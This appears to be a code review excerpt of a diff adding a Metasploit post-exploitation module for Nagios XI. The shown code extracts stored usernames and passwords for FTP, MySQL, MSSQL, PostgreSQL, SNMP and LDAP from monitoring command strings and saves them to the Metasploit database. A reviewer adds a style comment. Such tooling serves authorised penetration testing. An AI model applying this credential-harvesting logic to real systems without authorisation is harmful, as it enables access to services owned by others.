modules/post/linux/gather/enum_nagios_xi.rb

```diff
@@ -0,0 +1,326 @@
+
+          credential_data = {
+            username: username,
+            private_data: password,
+            private_type: :password,
+          }
+
+          login_data = {
+            address: host,
+            port: 21,
+            service_name: 'FTP',
+            protocol: 'tcp',
+          }
+
+      when "67" #MYSQL
+          host = row[1]
+          username=row[2].match(/--username=(.*?)\s/)[1]
+          password=row[2].match(/--password=%22(.*?)%22/)[1]
+
+          credential_data = {
+            username: username,
+            private_data: password,
+            private_type: :password,
+          }
+
+          login_data = {
+            address: host,
+            port: 3306,
+            service_name: 'MySQL',
+            protocol: 'tcp',
+          }
+
+      when "66" #MSSQL
+          host = row[1]
+          username=row[2].match(/-U '(.*?)'/)[1]
+          password=row[2].match(/-P '(.*?)'/)[1]
+
+          user_credential_data = parse_realm(username)
+          credential_data = {
+            private_data: password,
+            private_type: :password,
+          }.merge(user_credential_data)
+
+          login_data = {
+            address: host,
+            port: 1433,
+            service_name: 'MSSQL',
+            protocol: 'tcp',
+          }
+
+      when "76" #POSTGRES
+          host = row[1]
+          username=row[2].match(/--dbuser=(.*?)\s/)[1]
+          password=row[2].match(/--dbpass=%22(.*?)%22/)[1]
+
+          credential_data = {
+            username: username,
+            private_data: password,
+            private_type: :password,
+          }
+
+          login_data = {
+            address: host,
+            port: 5432,
+            service_name: 'PostgreSQL',
+            protocol: 'tcp',
+          }
+
+      when "85" #SNMP
+          host = row[1]
+          creds = row[2].split('!')
+          password = ' '
+          username = creds[0]
+          port = 161
+
+          credential_data = {
+            username: username,
+            private_data: password,
+            private_type: :password,
+          }
+
+          login_data = {
+            address: host,
+            port: 161,
+            service_name: 'SNMP',
+            protocol: 'udp',
+          }
+
+      when "88" #LDAP
+          host = row[1]
+          username = row[2].match(/-D %22(.*?)%22/)[1]
+          password = row[2].match(/-P %22(.*?)%22/)[1]
+
+          credential_data = {
+            username: username,
+            private_data: password,
+            private_type: :password,
+          }
+
+          login_data = {
+            address: host,
+            port: 389,
+            service_name: 'LDAP',
+            protocol: 'tcp',
+          }
+      else
+          #base case
+      end
+      unless credential_data.nil? || login_data.nil?
+        report_obj(credential_data, login_data)
+      end
+    end
+
+
+    print_status(%Q|Run 'creds' to see credentials loaded into the MSF DB|)
```

Comment:
This is a strange use of `%Q||` notation. Not really a big deal, but `"Run 'creds' to see credentials loaded into the MSF DB"` would be equally as effective.